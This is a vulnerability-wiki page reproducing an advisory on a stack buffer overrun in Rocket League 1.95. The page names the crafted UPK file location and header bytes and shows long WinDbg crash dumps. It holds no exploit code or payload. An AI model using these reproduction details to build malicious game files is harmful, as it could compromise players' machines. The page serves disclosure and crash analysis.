免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
EXP
# Exploit Title: Epic Games Rocket League 1.95 - Stack Buffer Overrun # Date: 25.04.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.epicgames.com https://www.rocketleague.com Epic Games Rocket League 1.95 (AK::MemoryMgr::GetPoolName) Stack Buffer Overrun Vendor: Epic Games Inc. | Psyonix, LLC Product web page: https://www.epicgames.com https://www.psyonix.com https://www.rocketleague.com Affected version: <=1.95 Summary: Rocket League is a high-powered hybrid of arcade-style soccer and vehicular mayhem with easy-to-understand controls and fluid, physics-driven competition. Desc: The game suffers from a stack-based buffer overflow vulnerability. The issue is caused due to a boundary error in the processing of a UPK format file, which can be exploited to cause a stack buffer overflow when a user crafts the file with a large array of bytes inserted in the vicinity offset after the magic header. Successful exploitation could allow execution of arbitrary code on the affected machine. Tested on: Microsoft Windows 10 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5651 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5651.php 25.04.2021 -- Craft location: ..\rocketleague\TAGame\CookedPCConsole Header: C1 83 2A 9E 64 03 1F 00 hat_Headphones_SF.upk: ---------------------- ... ... ModLoad: 00007ff9`99ff0000 00007ff9`9a016000 C:\WINDOWS\system32\ncryptsslp.dll ModLoad: 00007ff9`32d70000 00007ff9`36a00000 C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_e9f7884f9b4f82b9\igd9dxva64.dll ModLoad: 00007ff9`315b0000 00007ff9`32d68000 C:\WINDOWS\System32\DriverStore\FileRepository\nvlti.inf_amd64_d79c53dfaa1cbce3\nvd3dumx.dll ModLoad: 00000000`00400000 00000000`0041e000 E:\Epic Games\rocketleague\Binaries\Win64\XINPUT1_3.dll ModLoad: 00007ff9`8dac0000 00007ff9`8db6c000 C:\WINDOWS\SYSTEM32\TextShaping.dll 0110.33 Log: Timed out while waiting for GPU to catch up. (500 ms) (62c.1074): Unknown exception - code 00000001 (!!! second chance !!!) KERNELBASE!RaiseException+0x69: 00007ff9`a0364b59 0f1f440000 nop dword ptr rax+rax 0:024> r rax=00007ff99feeb925 rbx=0000000000000000 rcx=0000000000000000 rdx=000000214edfe8b0 rsi=000000214edfef50 rdi=000000214edfe700 rip=00007ff9a0364b59 rsp=000000214edfef30 rbp=0000000000000000 r8=000000214edfedb0 r9=0000000000000000 r10=00000000000000c0 r11=000000214edfee2e r12=0000000000000000 r13=00007ff776205bb0 r14=00007ff776dab710 r15=000000214edff8a0 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000204 KERNELBASE!RaiseException+0x69: 00007ff9`a0364b59 0f1f440000 nop dword ptr rax+rax 0:024> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* *** ERROR: Symbol file could not be found. Defaulted to export symbols for E:\Epic Games\rocketleague\Binaries\Win64\EOSSDK-Win64-Shipping.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\System32\DriverStore\FileRepository\nvlti.inf_amd64_d79c53dfaa1cbce3\nvwgf2umx.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Epic Games\Launcher\Portal\Extras\Overlay\EOSOVH-Win64-Shipping.dll - GetUrlPageData2 (WinHttp) failed: 12002. DUMP_CLASS: 2 DUMP_QUALIFIER: 0 FAULTING_IP: KERNELBASE!RaiseException+69 00007ffe`d4d64b59 0f1f440000 nop dword ptr rax+rax EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 00007ffed4d64b59 (KERNELBASE!RaiseException+0x0000000000000069) ExceptionCode: 00000001 ExceptionFlags: 00000000 NumberParameters: 0 FAULTING_THREAD: 00000490 DEFAULT_BUCKET_ID: APPLICATION_FAULT PROCESS_NAME: RocketLeague.exe ERROR_CODE: (NTSTATUS) 0x1 - STATUS_WAIT_1 EXCEPTION_CODE: (Win32) 0x1 (1) - Incorrect function. EXCEPTION_CODE_STR: 1 WATSON_BKT_PROCSTAMP: 606f6afa WATSON_BKT_PROCVER: 1.0.10897.0 PROCESS_VER_PRODUCT: Rocket League WATSON_BKT_MODULE: KERNELBASE.dll WATSON_BKT_MODSTAMP: 2f2f77bf WATSON_BKT_MODOFFSET: 34b59 WATSON_BKT_MODVER: 10.0.19041.906 MODULE_VER_PRODUCT: Microsoft® Windows® Operating System BUILD_VERSION_STRING: 10.0.19041.928 (WinBuild.160101.0800) MODLIST_WITH_TSCHKSUM_HASH: ac197712fdc57f2bb67f9b17107e5701c93b4362 MODLIST_SHA1_HASH: 342698e051c108fd7be71346f5d34f8a14c38381 NTGLOBALFLAG: 0 PROCESS_BAM_CURRENT_THROTTLED: 0 PROCESS_BAM_PREVIOUS_THROTTLED: 0 APPLICATION_VERIFIER_FLAGS: 0 PRODUCT_TYPE: 1 SUITE_MASK: 784 DUMP_TYPE: fe ANALYSIS_SESSION_HOST: LAB17 ANALYSIS_SESSION_TIME: 04-25-2021 13:23:34.0003 ANALYSIS_VERSION: 10.0.16299.91 amd64fre THREAD_ATTRIBUTES: OS_LOCALE: ENU PROBLEM_CLASSES: ID: 0n308 Type: APPLICATION_FAULT Class: Primary Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) BUCKET_ID Name: Add Data: Omit PID: Unspecified TID: Unspecified Frame: 0 BUGCHECK_STR: APPLICATION_FAULT PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT LAST_CONTROL_TRANSFER: from 00007ff78f1cbf65 to 00007ffed4d64b59 STACK_TEXT: 00000089`23dfe910 00007ff7`8f1cbf65 : 00007ff7`9123b710 00000000`000002f8 00007ff7`906e5190 00000089`23dfea20 : KERNELBASE!RaiseException+0x69 00000089`23dfe9f0 00007ff7`8f190215 : 00000089`23dff710 00000089`23dff5d0 00000089`23dff710 00007ffe`d72ee25f : RocketLeague!GetOutermost+0x29245 00000089`23dff250 00007ff7`8f123466 : 00000089`23dff710 00007ff7`906eb668 00000199`6cf33e40 00000089`23dfe828 : RocketLeague!AK::MusicEngine::Term+0xfce95 00000089`23dff4d0 00007ff7`8f1297f9 : 0000019a`00000001 00000000`00000000 00000089`23dff770 00000199`00000001 : RocketLeague!AK::MusicEngine::Term+0x900e6 00000089`23dff6d0 00007ff7`8f1d1e40 : 00000000`00000001 00000000`00000001 0000019a`00000000 00000199`6d26ffd0 : RocketLeague!AK::MusicEngine::Term+0x96479 00000089`23dff850 00007ffe`d6297034 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : RocketLeague!Scaleform::System::Init+0x11c0 00000089`23dff880 00007ffe`d7302651 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14 00000089`23dff8b0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21 THREAD_SHA1_HASH_MOD_FUNC: b03d2da27c20caaf2a76cdae45ff251160c76115 THREAD_SHA1_HASH_MOD_FUNC_OFFSET: ff5c11b082c48239ef2666814fc4e06663a8c892 THREAD_SHA1_HASH_MOD: 96a23e97d7538141fe1b904de60919531df8b505 FOLLOWUP_IP: RocketLeague!GetOutermost+29245 00007ff7`8f1cbf65 eb13 jmp RocketLeague!GetOutermost+0x2925a (00007ff7`8f1cbf7a) FAULT_INSTR_CODE: 8b4813eb SYMBOL_STACK_INDEX: 1 SYMBOL_NAME: rocketleague!GetOutermost+29245 FOLLOWUP_NAME: MachineOwner MODULE_NAME: RocketLeague IMAGE_NAME: RocketLeague.exe DEBUG_FLR_IMAGE_TIMESTAMP: 606f6afa STACK_COMMAND: ~24s ; .cxr ; kb FAILURE_BUCKET_ID: APPLICATION_FAULT_1_RocketLeague.exe!GetOutermost BUCKET_ID: APPLICATION_FAULT_rocketleague!GetOutermost+29245 FAILURE_EXCEPTION_CODE: 1 FAILURE_IMAGE_NAME: RocketLeague.exe BUCKET_ID_IMAGE_STR: RocketLeague.exe FAILURE_MODULE_NAME: RocketLeague BUCKET_ID_MODULE_STR: RocketLeague FAILURE_FUNCTION_NAME: GetOutermost BUCKET_ID_FUNCTION_STR: GetOutermost BUCKET_ID_OFFSET: 29245 BUCKET_ID_MODTIMEDATESTAMP: 606f6afa BUCKET_ID_MODCHECKSUM: 251425f BUCKET_ID_MODVER_STR: 1.0.10897.0 BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_ FAILURE_PROBLEM_CLASS: APPLICATION_FAULT FAILURE_SYMBOL_NAME: RocketLeague.exe!GetOutermost WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/RocketLeague.exe/1.0.10897.0/606f6afa/KERNELBASE.dll/10.0.19041.906/2f2f77bf/1/00034b59.htm?Retriage=1 TARGET_TIME: 2021-04-25T11:23:44.000Z OSBUILD: 19042 OSSERVICEPACK: 928 SERVICEPACK_NUMBER: 0 OS_REVISION: 0 OSPLATFORM_TYPE: x64 OSNAME: Windows 10 OSEDITION: Windows 10 WinNt SingleUserTS Personal USER_LCID: 0 OSBUILD_TIMESTAMP: 2022-01-18 11:29:28 BUILDDATESTAMP_STR: 160101.0800 BUILDLAB_STR: WinBuild BUILDOSVER_STR: 10.0.19041.928 ANALYSIS_SESSION_ELAPSED_TIME: 795d ANALYSIS_SOURCE: UM FAILURE_ID_HASH_STRING: um:application_fault_1_rocketleague.exe!getoutermost FAILURE_ID_HASH: {ee1c73f7-ce6b-9e4a-8e1b-66937ecee43c} Followup: MachineOwner ... ... (aa0.3818): Unknown exception - code 00000001 (first chance) (aa0.3818): Unknown exception - code 00000001 (!!! second chance !!!) KERNELBASE!RaiseException+0x69: 00007ffe`d4d64b59 0f1f440000 nop dword ptr rax+rax 0:024> g 0188.65 Warning: Warning, Detected data corruption header trying to read 2549 bytes at offset 135132 from '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'. Please delete file and recook. 0188.65 Critical: appError called: I/O failure operating on '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk' 0188.65 Critical: Windows GetLastError: The operation completed successfully. (0) 0188.65 Warning: Warning, Detected data corruption undershoot trying to read 2549 bytes at offset 135132 from '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'. Please delete file and recook. 0188.65 Critical: Error reentered: I/O failure operating on '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk' 0188.65 Warning: Warning, Detected data corruption incorrect uncompressed size calculated 1094795585 bytes, requested 2549 bytes at offset 135132 from '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'. Please delete file and recook. 0188.65 Critical: Error reentered: I/O failure operating on '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk' 0188.66 DevBeacon: FWebSocket::ReadCloseReason this=000002B686633200 received opcode CLOSE. Code=1000 Reason=IdleTimeout 0188.66 DevOnline: EOSSDK-LogEOS: Large tick time detected 22.5409 hat_peanut_SF.upk: ------------------ ... ... 0:077> g (3568.230c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. VCRUNTIME140!memcmp+0xee: 00007ffe`afc812de f3a4 rep movs byte ptr rdi,byte ptr rsi 0:000> r rax=0000009852afeaf8 rbx=000001a1cc362268 rcx=ffffffff9c71eae4 rdx=0000010951ea4107 rsi=000001a1a49a4107 rdi=0000009852b00000 rip=00007ffeafc812de rsp=0000009852afe9c8 rbp=ffffffff9c71ffec r8=ffffffff9c71ffec r9=00000000000000ff r10=000001a1a49a2bff r11=0000009852afeaf8 r12=0000000000000000 r13=0000000000000000 r14=0000009852afeaf8 r15=0000000000000000 iopl=0 nv up ei pl nz na pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 VCRUNTIME140!memcmp+0xee: 00007ffe`afc812de f3a4 rep movs byte ptr rdi,byte ptr rsi 0:000> g (3568.230c): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE RocketLeague!AK::MemoryMgr::GetPoolName+0x84164: 00007ff6`4a660424 cd29 int 29h 0:000> .exr -1 ExceptionAddress: 00007ff64a660424 (RocketLeague!AK::MemoryMgr::GetPoolName+0x0000000000084164) ExceptionCode: c0000409 (Security check failure or stack buffer overrun) ExceptionFlags: 00000001 NumberParameters: 1 Parameter0: 0000000000000002 Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE 0:000> u 00007ff64a660424 RocketLeague!AK::MemoryMgr::GetPoolName+0x84164: 00007ff6`4a660424 cd29 int 29h 00007ff6`4a660426 488d0d3303f600 lea rcx,RocketLeague!AK::IAkStreamMgr::m_pStreamMgr+0x1d678 (00007ff6`4b5c0760) 00007ff6`4a66042d e8ca010000 call RocketLeague!AK::MemoryMgr::GetPoolName+0x8433c (00007ff6`4a6605fc) 00007ff6`4a660432 488b442438 mov rax,qword ptr rsp+38h 00007ff6`4a660437 4889051a04f600 mov qword ptr RocketLeague!AK::IAkStreamMgr::m_pStreamMgr+0x1d770 (00007ff6`4b5c0858),rax 00007ff6`4a66043e 488d442438 lea rax,rsp+38h 00007ff6`4a660443 4883c008 add rax,8 00007ff6`4a660447 488905aa03f600 mov qword ptr RocketLeague!AK::IAkStreamMgr::m_pStreamMgr+0x1d710 (00007ff6`4b5c07f8),rax 0:000> kb 10 # RetAddr : Args to Child : Call Site 00 00007ff6`4a65fdcf : efaf2d5d`3bda668e 00000000`00000000 00000098`52afe090 00000098`52afe080 : RocketLeague!AK::MemoryMgr::GetPoolName+0x84164 01 00007ffe`d735207f : 00007ff6`4a65fdbc 00000000`00000000 00000000`00000000 00000000`00000000 : RocketLeague!AK::MemoryMgr::GetPoolName+0x83b0f 02 00007ffe`d7301454 : 00000000`00000000 00000098`52afe070 00000098`52afe730 00000000`00000000 : ntdll!RtlpExecuteHandlerForException+0xf 03 00007ffe`d7350bae : 3f400000`3f000000 3f800000`3f800000 000001a1`cc362268 44160000`44bb8000 : ntdll!RtlDispatchException+0x244 04 00007ffe`afc812de : 00000000`00000000 000001a1`cc3560c0 00007ff6`4948a38b 000001a1`cc362268 : ntdll!KiUserExceptionDispatch+0x2e 05 00007ff6`4948a38b : 000001a1`cc362268 00000098`52afea40 00000098`52afea40 000001a1`cc362268 : VCRUNTIME140!memcpy_repmovs+0xe d:\agent\_work\1\s\src\vctools\crt\vcruntime\src\string\amd64\memcpy.asm @ 114 06 00007ff6`494fe648 : 000001a1`cc362268 00000098`52afead8 00002215`1710d82a 00007ff6`00000003 : RocketLeague!AK::MusicEngine::Term+0x9700b 07 00007ff6`494e3e65 : 000001a1`cc362080 00000098`52afead8 00000000`00000000 00000000`00000001 : RocketLeague!AK::MusicEngine::Term+0x10b2c8 08 fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : RocketLeague!AK::MusicEngine::Term+0xf0ae5 09 efaf2dc5`69758c3e : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60 0a fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : 0xefaf2dc5`69758c3e 0b efaf2dc5`69758c3e : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60 0c fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : 0xefaf2dc5`69758c3e 0d efaf2dc5`69758c3e : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60 0e fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : 0xefaf2dc5`69758c3e 0f efaf2dc5`69758c3e : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60 0:000> !analyze -m ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* KEY_VALUES_STRING: 1 Key : Analysis.CPU.mSec Value: 5640 Key : Analysis.DebugAnalysisManager Value: Create Key : Analysis.Elapsed.mSec Value: 6467 Key : Analysis.Init.CPU.mSec Value: 400749 Key : Analysis.Init.Elapsed.mSec Value: 1699165 Key : Analysis.Memory.CommitPeak.Mb Value: 261 Key : FailFast.Name Value: STACK_COOKIE_CHECK_FAILURE Key : FailFast.Type Value: 2 Key : Timeline.OS.Boot.DeltaSec Value: 215108 Key : Timeline.Process.Start.DeltaSec Value: 1744 Key : WER.OS.Branch Value: vb_release Key : WER.OS.Timestamp Value: 2019-12-06T14:06:00Z Key : WER.OS.Version Value: 10.0.19041.1 Key : WER.Process.Version Value: 1.0.10897.0 NTGLOBALFLAG: 0 PROCESS_BAM_CURRENT_THROTTLED: 0 PROCESS_BAM_PREVIOUS_THROTTLED: 0 APPLICATION_VERIFIER_FLAGS: 0 EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 00007ff64a660424 (RocketLeague!AK::MemoryMgr::GetPoolName+0x0000000000084164) ExceptionCode: c0000409 (Security check failure or stack buffer overrun) ExceptionFlags: 00000001 NumberParameters: 1 Parameter0: 0000000000000002 Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE FAULTING_THREAD: 0000230c PROCESS_NAME: RocketLeague.exe ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_CODE_STR: c0000409 EXCEPTION_PARAMETER1: 0000000000000002 STACK_TEXT: 00000098`52afda90 00007ff6`4a65fdcf : efaf2d5d`3bda668e 00000000`00000000 00000098`52afe090 00000098`52afe080 : RocketLeague!AK::MemoryMgr::GetPoolName+0x84164 00000098`52afdad0 00007ffe`d735207f : 00007ff6`4a65fdbc 00000000`00000000 00000000`00000000 00000000`00000000 : RocketLeague!AK::MemoryMgr::GetPoolName+0x83b0f 00000098`52afdb00 00007ffe`d7301454 : 00000000`00000000 00000098`52afe070 00000098`52afe730 00000000`00000000 : ntdll!RtlpExecuteHandlerForException+0xf 00000098`52afdb30 00007ffe`d7350bae : 3f400000`3f000000 3f800000`3f800000 000001a1`cc362268 44160000`44bb8000 : ntdll!RtlDispatchException+0x244 00000098`52afe240 00007ffe`afc812de : 00000000`00000000 000001a1`cc3560c0 00007ff6`4948a38b 000001a1`cc362268 : ntdll!KiUserExceptionDispatch+0x2e 00000098`52afe9c8 00007ff6`4948a38b : 000001a1`cc362268 00000098`52afea40 00000098`52afea40 000001a1`cc362268 : VCRUNTIME140!memcpy_repmovs+0xe 00000098`52afe9e0 00007ff6`494fe648 : 000001a1`cc362268 00000098`52afead8 00002215`1710d82a 00007ff6`00000003 : RocketLeague!AK::MusicEngine::Term+0x9700b 00000098`52afea20 00007ff6`494e3e65 : 000001a1`cc362080 00000098`52afead8 00000000`00000000 00000000`00000001 : RocketLeague!AK::MusicEngine::Term+0x10b2c8 00000098`52afeab0 fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : RocketLeague!AK::MusicEngine::Term+0xf0ae5 ... ... STACK_COMMAND: ~0s ; .cxr ; kb SYMBOL_NAME: RocketLeague!AK::MemoryMgr::GetPoolName+84164 MODULE_NAME: RocketLeague IMAGE_NAME: RocketLeague.exe FAILURE_BUCKET_ID: FAIL_FAST_STACK_BUFFER_OVERRUN_STACK_COOKIE_CHECK_FAILURE_MISSING_GSFRAME_c0000409_RocketLeague.exe!AK::MemoryMgr::GetPoolName OS_VERSION: 10.0.19041.1 BUILDLAB_STR: vb_release OSPLATFORM_TYPE: x64 OSNAME: Windows 10 IMAGE_VERSION: 1.0.10897.0 FAILURE_ID_HASH: {3e6f3f5b-25bb-68b3-2a5b-232743df7884} Followup: MachineOwner
pwnwiki.com